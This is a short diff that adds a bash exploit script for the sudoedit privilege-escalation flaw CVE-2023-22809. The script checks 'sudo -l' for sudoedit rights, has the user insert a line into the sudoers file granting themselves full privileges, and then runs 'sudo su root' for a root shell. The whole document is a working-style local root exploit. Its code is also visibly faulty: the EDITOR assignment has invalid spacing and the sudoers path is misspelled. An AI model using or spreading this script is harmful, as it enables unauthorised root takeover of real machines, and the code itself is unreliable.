| 1 | + | #!/usr/bin/env bash |
| 2 | + | # |
| 3 | + | # sudo 1.8.0 - 1.9.12p1 - Privilege Escalation |
| 4 | + | # |
| 5 | + | # Exploit Author: n3m1.sys |
| 6 | + | # CVE: CVE-2023-22809 |
| 7 | + | # Vendor Homepage: https://www.sudo.ws/ |
| 8 | + | # Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz |
| 9 | + | # Version: 1.8.0 to 1.9.12p1 |
| 10 | + | # Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9 |
| 11 | + | # |
| 12 | + | # Running this exploit on a vulnerable system allows a localiattacker to gain |
| 13 | + | # a root shell on the machine. |
| 14 | + | # |
| 15 | + | # The exploit checks if the current user has privileges to run sudoedit or |
| 16 | + | # sudo -e on a file as root. If so it will open the sudoers file for the |
| 17 | + | # attacker to add a line to gain privileges on all the files and get a root |
| 18 | + | # shell. |
| 19 | + | |
| 20 | + | EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-) |
| 21 | + | |
| 22 | + | if [ -z "$EXPLOITABLE" ]; then |
| 23 | + | echo "> This user can't run sudoedit as root" |
| 24 | + | else |
| 25 | + | echo "> BINGO! User exploitable" |
| 26 | + | echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:" |
| 27 | + | echo "$USER ALL=(ALL:ALL) ALL" |
| 28 | + | read -n 1 -s -r -p "Press any key to continue..." |
| 29 | + | EDITOR = "vim -- /etc/suoders" $EXPLOITABLE |
| 30 | + | sudo su root |
| 31 | + | fi |
| 32 | + | |